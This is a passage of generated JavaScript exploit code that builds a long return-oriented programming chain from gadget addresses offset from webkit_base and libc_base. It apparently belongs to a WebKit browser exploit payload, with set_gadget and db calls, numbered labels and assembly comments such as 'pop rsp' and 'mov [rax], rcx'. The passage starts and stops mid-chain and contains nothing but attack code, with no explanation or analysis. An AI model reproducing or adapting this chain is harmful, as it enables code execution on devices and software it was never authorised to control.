//L7210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+353848, //L7212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+353832, //L7211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7210: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7211: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7212: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+354008, //L7214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+354024, //L7215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+353992, //L7213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7213: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7214: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7215: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+354184, //L7219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+354152, //L7217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+354168, //L7218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7216: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7217: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7218: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); 
//pop rax //L7219: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+354248, //L7220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7220: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7222: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+354328, //L7224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7224: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+355112, //L7223 //L7167: libc_base+764760, //pop rsi ropchain+354392, //L7226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7226: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7228: db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+354512, //L7231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+354496, //L7229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7231: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+354688, //L7234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+354704, //L7235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+354656, //L7232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+354672, //L7233 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7232: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7233: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7234: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7235: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+354784, //L7236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+354800, //L7237 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7236: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7237: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+354960, //L7241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+354928, //L7239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+354944, //L7240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7238: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7240: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7241: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+355024, //L7242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7242: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7244: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+355104, //L7245 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7245: db([0, 0]); // 0x0 //L7223: set_gadgets([ libc_base+764760, //pop rsi ropchain+355152, //L7247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7247: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7249: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+355272, //L7252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+355256, //L7250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7250: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7252: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+355416, //L7255 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+355384, //L7253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+355400, //L7254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7253: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7254: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7255: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+355504, //L7257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L7256: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L7257: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+355560, //L7258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, 
//mov rax, r8 libc_base+763368 //pop rcx ]); //L7258: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7260: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+355640, //L7262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7262: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L7113: //L7062: libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+355736, //L7264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7263: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7264: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7265: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+355816, //L7266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7266: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7268: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L7270: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+355976, //L7273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+355960, //L7271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7271: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7273: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760, //pop rsi ropchain+356056, //L7274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+356072, //L7275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7274: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7275: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+356232, //L7279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+356200, //L7277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+356216, //L7278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7276: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7277: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7278: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7279: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+356288, //L7281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7281: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+356416, //L7283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+356432, //L7284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+356400, //L7282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7282: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7283: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7284: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, 
//pop rsi ropchain+356592, //L7288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+356560, //L7286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+356576, //L7287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7285: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7286: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7287: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7288: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+356648, //L7290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7290: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+356776, //L7292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+356792, //L7293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+356760, //L7291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7291: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7292: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7293: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+356952, //L7297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+356920, //L7295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+356936, //L7296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7294: db([24, 0]); // 0x18 
set_gadget(webkit_base+3236123,); //pop r9 //L7295: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7296: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7297: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+357008, //L7299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7299: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+357136, //L7301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+357152, //L7302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+357120, //L7300 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7300: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7301: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7302: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+357232, //L7303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+357248, //L7304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7303: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7304: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+357344, //L7306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+357328, //L7305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7305: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7306: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+357424, //L7307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7307: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7308: db([46, 0]); // 0x2e set_gadget(libc_base+144605,); //pop rdi //L7309: db([46, 0]); // 0x2e set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+357568, //L7310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+357600, //L7312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+357584, //L7311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7310: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7311: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7312: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+357768, //L7314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+357784, //L7315 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+357752, //L7313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7313: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7314: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7315: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+357896, //L7317 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+357944, //L7320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+357912, //L7318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7317: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7318: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7319: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7320: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+358056, //L7321+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+358048, //L7321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7321: db([0, 0]); // 0x0 set_gadgets([ ropchain+358072, //L7321+24 ropchain+368160, //L7316 libc_base+764760, //pop rsi ropchain+358112, //L7322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7322: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7324: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+358232, //L7327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+358216, //L7325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7325: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7327: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+358408, //L7330 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+358424, //L7331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+358376, //L7328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+358392, //L7329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7328: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7329: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7330: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7331: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+358520, //L7333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+358504, //L7332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7332: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7333: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7334: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7335: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L7336: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+358720, //L7338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7338: db([0, 
0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+358776, //L7339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7339: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+358912, //L7343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+358896, //L7342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7341: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7342: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7343: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+358976, //L7344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7344: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7346: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L7348: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+359136, //L7351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+359120, //L7349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7349: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7351: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+359280, //L7354 webkit_base+660161, //mov [rsi], rax ; mov al, 
1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+359248, //L7352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+359264, //L7353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7352: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7353: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7354: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+359368, //L7356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L7355: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L7356: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+359424, //L7357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7357: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7359: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+359504, //L7361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7361: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+359584, //L7362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7362: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7364: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+359704, //L7367 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+359688, //L7365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7365: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7367: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+359784, //L7368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+359800, //L7369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7368: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7369: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+359960, //L7373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+359928, //L7371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+359944, //L7372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7370: 